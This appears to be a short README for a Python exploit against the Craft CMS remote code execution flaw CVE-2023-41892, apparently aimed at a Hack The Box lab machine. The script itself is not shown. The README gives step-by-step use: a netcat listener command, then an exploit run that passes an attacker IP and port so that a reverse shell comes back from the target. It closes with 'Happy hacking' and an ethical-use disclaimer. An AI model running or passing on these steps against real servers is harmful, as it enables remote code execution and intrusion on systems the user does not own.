This python script exploits the Remote Code Execution vulnerability (CVE-2023-41892) of the Craft CMS, which is a popular content management system. Versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability allowing attackers to execute arbitrary code remotely, like a PHP reverse shell.
First start a netcat listener in another shell:
nc -nlvp 1234
Then check your ip address and run the exploit:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
Happy hacking with your brand new reverse shell!
This code is intended for ethical hacking purposes only and should not be used for any malicious activities!
Thanks to to016 for the original code than can be found in this Gist